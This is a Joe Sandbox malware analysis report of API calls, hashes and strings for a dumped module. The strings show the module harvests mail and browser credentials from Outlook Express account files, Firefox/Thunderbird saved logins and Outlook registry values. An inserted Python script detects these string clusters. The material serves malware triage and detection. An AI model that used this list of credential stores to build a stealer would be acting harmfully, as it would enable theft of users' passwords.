                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: EnumNamesResource
                                                                                                              • String ID:
                                                                                                              • API String ID: 3334572018-0
                                                                                                              • Opcode ID: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                                                                              • Instruction ID: 5afcab74deb5f1f746bbc86617496166ce7982b7e139a3a4a0d32d3f52cd2e16
                                                                                                              • Opcode Fuzzy Hash: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                                                                              • Instruction Fuzzy Hash: 05C09B3119534197C7519F108C4DF1B7695BB59706F144D297191940A4D7514054DE05
                                                                                                              APIs
                                                                                                              • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseFind
                                                                                                              • String ID:
                                                                                                              • API String ID: 1863332320-0
                                                                                                              • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                              • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                                                                              • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                              • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                                                                              APIs
                                                                                                              • RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Open
                                                                                                              • String ID:
                                                                                                              • API String ID: 71445658-0
                                                                                                              • Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                                                              • Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
                                                                                                              • Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                                                              • Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
                                                                                                              APIs
                                                                                                              • GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AttributesFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 3188754299-0
                                                                                                              • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                              • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                                                                              • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                              • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: PrivateProfileString_mbscmpstrlen
                                                                                                              • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                                              • API String ID: 3963849919-1658304561
                                                                                                              • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                              • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                                                                                              • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                              • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                                                                                              APIs
                                                                                                                • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                                • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                                • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                                • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                                                                                • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                                                                                                                • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                                                                                              • memset.MSVCRT ref: 0040E5B8
                                                                                                              • memset.MSVCRT ref: 0040E5CD
                                                                                                              • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E634
                                                                                                              • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E64A
                                                                                                              • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E660
                                                                                                              • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E676
                                                                                                              • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E68C
                                                                                                              • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E69F
                                                                                                              • memset.MSVCRT ref: 0040E6B5
                                                                                                              • memset.MSVCRT ref: 0040E6CC
                                                                                                                • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                                                                                • Part of subcall function 004066A3: memcmp.MSVCRT(?,00456EA0,00000010,?,?,000000FF), ref: 004066EE
                                                                                                              • memset.MSVCRT ref: 0040E736
                                                                                                              • memset.MSVCRT ref: 0040E74F
                                                                                                              • sprintf.MSVCRT ref: 0040E76D
                                                                                                              • sprintf.MSVCRT ref: 0040E788
                                                                                                              • _strcmpi.MSVCRT ref: 0040E79E
                                                                                                              • _strcmpi.MSVCRT ref: 0040E7B7
                                                                                                              • _strcmpi.MSVCRT ref: 0040E7D3
                                                                                                              • memset.MSVCRT ref: 0040E858
                                                                                                              • sprintf.MSVCRT ref: 0040E873
                                                                                                              • _strcmpi.MSVCRT ref: 0040E889
                                                                                                              • _strcmpi.MSVCRT ref: 0040E8A5
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                                                                              • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                                                              • API String ID: 4171719235-3943159138
                                                                                                              • Opcode ID: d167a2cf797b5d1909f19c572c007443fa0765fe7e0db263b7bd4f21149122ce
                                                                                                              • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                                                                                                              • Opcode Fuzzy Hash: d167a2cf797b5d1909f19c572c007443fa0765fe7e0db263b7bd4f21149122ce
                                                                                                              • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                                                                              • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                                                                              • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                                                                              • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                                                                              • GetWindowRect.USER32(?,?), ref: 00410487
                                                                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                                                                              • GetDC.USER32 ref: 004104E2
                                                                                                              • strlen.MSVCRT ref: 00410522
                                                                                                              • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                                                                              • ReleaseDC.USER32(?,?), ref: 00410580
                                                                                                              • sprintf.MSVCRT ref: 00410640
                                                                                                              • SetWindowTextA.USER32(?,?), ref: 00410654
                                                                                                              • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                                                                              • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                                                                              • GetClientRect.USER32(?,?), ref: 004106DD
                                                                                                              • GetWindowRect.USER32(?,?), ref: 004106E7
                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                                                                              • GetClientRect.USER32(?,?), ref: 00410737
                                                                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                                              • String ID: %s:$EDIT$STATIC
                                                                                                              • API String ID: 1703216249-3046471546
                                                                                                              • Opcode ID: c45e47aa9121f830d125028a7f876627aec3aac4030610de851cfdb352c947b7
                                                                                                              • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                                                                                                              • Opcode Fuzzy Hash: c45e47aa9121f830d125028a7f876627aec3aac4030610de851cfdb352c947b7
                                                                                                              • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 004024F5
                                                                                                                • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                                              • _mbscpy.MSVCRT(?,00000000,?,?,?,7686EB20,?,00000000), ref: 00402533
                                                                                                              • _mbscpy.MSVCRT(?,?), ref: 004025FD
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _mbscpy$QueryValuememset
                                                                                                              • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                                              • API String ID: 168965057-606283353
                                                                                                              • Opcode ID: 1065c6c96e973ba162a7e339d79e3b52940ae0a945bba20f0fb5bc86a04de48d
                                                                                                              • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                                                                                                              • Opcode Fuzzy Hash: 1065c6c96e973ba162a7e339d79e3b52940ae0a945bba20f0fb5bc86a04de48d
                                                                                                              • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
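The String ID fields of the three credential-harvesting functions above (the `*.oeaccount` / `POP3Password` / `ESMTPPassword` set, the `logins` / `hostname` / `httpRealm` / `encryptedPassword` / `imap://%s` set, and the `POP3 Server` / `IMAP User Name` / `Password2` / `SMTP Server` registry value names, plus the `Shell Folders` key used to locate profile directories) are a compact signature of the mail and browser credential recovery code carried inside the dumped module at 0x400000. The following is an added triage script, not code from the Joe Sandbox report or from the sample: it scans a dump for those string clusters and reports which credential stores the module is equipped to read. Only the byte strings are taken from the report; the cluster names, the 0.6 coverage threshold, the function names and the `SAMPLE_DUMP` / `CLEAN_BLOB` inputs are this example's own constructions.

```python
"""Triage a dumped module for mail/browser credential-harvesting string clusters.

Added example; not part of the Joe Sandbox report and not the sample's own code.
The byte strings are copied from the report's String ID fields. Cluster names,
the threshold and the sample blobs below are constructed for this example.
"""
from __future__ import annotations

from pathlib import Path

# Each cluster groups the strings that, in the dumped 32-bit module, sit in one
# function and identify the credential store that function reads.
STRING_CLUSTERS: dict[str, tuple[bytes, ...]] = {
    "oeaccount (Outlook Express / Windows Mail account files)": (
        b"*.oeaccount", b"POP3Server", b"POP3Username", b"POP3Password",
        b"SMTPServer", b"ESMTPUsername", b"ESMTPPassword",
    ),
    "logins.json (Thunderbird / Firefox saved logins)": (
        b"logins", b"hostname", b"httpRealm", b"encryptedUsername",
        b"encryptedPassword", b"usernameField", b"passwordField",
        b"imap://%s", b"mailbox://%s", b"smtp://%s",
    ),
    "Outlook profile registry values": (
        b"POP3 Server", b"POP3 User Name", b"POP3 Port",
        b"IMAP Server", b"IMAP User Name", b"IMAP Port",
        b"SMTP Server", b"SMTP Email Address", b"SMTP Display Name",
        b"HTTPMail Server", b"HTTPMail User Name", b"Password2",
    ),
    "profile path discovery (Shell Folders key)": (
        b"Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders",
    ),
}


def scan_bytes(data: bytes, threshold: float = 0.6) -> dict[str, dict]:
    """For every cluster, list the strings found in `data`, the fraction found,
    and whether the cluster counts as present (fraction >= threshold).

    Matching is plain ASCII substring search, which is what this dump contains;
    a UTF-16 build of the same code would need the needles re-encoded.
    """
    report: dict[str, dict] = {}
    for name, needles in STRING_CLUSTERS.items():
        found = [n.decode() for n in needles if n in data]
        ratio = len(found) / len(needles)
        report[name] = {"found": found, "ratio": ratio, "present": ratio >= threshold}
    return report


def flagged_clusters(data: bytes, threshold: float = 0.6) -> list[str]:
    """Names of the clusters whose string coverage meets the threshold."""
    return [name for name, r in scan_bytes(data, threshold).items() if r["present"]]


def scan_file(path: str | Path, threshold: float = 0.6) -> list[str]:
    """Convenience wrapper for a dump on disk (e.g. an .sdmp from the report)."""
    return flagged_clusters(Path(path).read_bytes(), threshold)


# Constructed stand-in for a dumped module: padding with a subset of the strings
# embedded. This is not the real sample's memory.
SAMPLE_DUMP = (
    b"\x00" * 64
    + b"*.oeaccount\x00POP3Password\x00ESMTPPassword\x00POP3Server\x00ESMTPUsername\x00"
    + b"\x90" * 32
    + b"logins\x00hostname\x00httpRealm\x00encryptedPassword\x00encryptedUsername\x00"
    + b"imap://%s\x00smtp://%s\x00mailbox://%s\x00"
    + b"Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\x00"
    + b"\x00" * 64
)
# A benign blob: one stray registry value name is not enough to trip a cluster.
CLEAN_BLOB = b"hello world " * 32 + b"SMTP Server\x00"

if __name__ == "__main__":
    for name, r in scan_bytes(SAMPLE_DUMP).items():
        mark = "HIT " if r["present"] else "    "
        print(f"{mark}{name}: {len(r['found'])}/{len(STRING_CLUSTERS[name])} strings")
```

The threshold keeps a single shared word such as `hostname` or `logins` from flagging a module on its own; a cluster is only reported when most of its strings co-occur, which is the pattern the report's per-function String ID fields show. Run `scan_file()` against the `.sdmp` of process 9 referenced above to confirm all four clusters are present.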
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                                                              • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                                                              • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                                                              • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                                                              • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                                                              • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                                                              • DeleteObject.GDI32(?), ref: 00401226
                                                                                                              • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                                                              • ShowWindow.USER32(00000000), ref: 00401253
                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                                                              • ShowWindow.USER32(00000000), ref: 00401262
                                                                                                              • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                                                                              • memset.MSVCRT ref: 0040128E
                                                                                                              • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                                                              • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                                                              • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                                              • String ID:
                                                                                                              • API String ID: 2998058495-0
                                                                                                              • Opcode ID: 1304d1c8d715b31a593d177d1fcf49c0df4ecd0a9b3deb669dc5f6aa527f4ccf
                                                                                                              • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                                                                              • Opcode Fuzzy Hash: 1304d1c8d715b31a593d177d1fcf49c0df4ecd0a9b3deb669dc5f6aa527f4ccf
                                                                                                              • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                                                                              APIs
                                                                                                              • memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                                                                              • memcmp.MSVCRT(localhost,?,00000009,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442656
                                                                                                              • memcmp.MSVCRT(vfs,00000001,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442800
                                                                                                              • memcmp.MSVCRT(cache,00000001,00000005,00000000,00000000,BINARY), ref: 0044282C
                                                                                                              • memcmp.MSVCRT(mode,00000001,00000004,00000000,00000000,BINARY), ref: 0044285E
                                                                                                              • memcmp.MSVCRT(?,?,G+D,00000000,00000000,BINARY), ref: 004428A9
                                                                                                              • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 0044293C
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcmp$memcpy
                                                                                                              • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                                                              • API String ID: 231171946-2189169393
                                                                                                              • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                              • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                                                                                                              • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                              • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                                                              • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                              • API String ID: 633282248-1996832678
                                                                                                              • Opcode ID: 3118318c37942661f5fcffc3ac6ba245d9ce7bfece0bd670dd31aaefef13242f
                                                                                                              • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                                                                                              • Opcode Fuzzy Hash: 3118318c37942661f5fcffc3ac6ba245d9ce7bfece0bd670dd31aaefef13242f
                                                                                                              • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sprintf$memset$_mbscpy
                                                                                                              • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                              • API String ID: 3402215030-3842416460
                                                                                                              • Opcode ID: ea23fa7928f637b81322df5704cb4e79e7cdaf63d3e69134c948d1ddb26e9ea3
                                                                                                              • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                                                                                              • Opcode Fuzzy Hash: ea23fa7928f637b81322df5704cb4e79e7cdaf63d3e69134c948d1ddb26e9ea3
                                                                                                              • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                                                                                              APIs
                                                                                                                • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                                                                • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                                                                                                • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                                                                                                                • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                                                                                                                • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                                                                • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                                                                • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                                                                                • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                                                                • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                                                • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                                                • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                                                                              • strlen.MSVCRT ref: 0040F139
                                                                                                              • strlen.MSVCRT ref: 0040F147
                                                                                                              • memset.MSVCRT ref: 0040F187
                                                                                                              • strlen.MSVCRT ref: 0040F196
                                                                                                              • strlen.MSVCRT ref: 0040F1A4
                                                                                                              • memset.MSVCRT ref: 0040F1EA
                                                                                                              • strlen.MSVCRT ref: 0040F1F9
                                                                                                              • strlen.MSVCRT ref: 0040F207
                                                                                                              • _strcmpi.MSVCRT ref: 0040F2B2
                                                                                                              • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                                                                                                              • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                                                                                                                • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
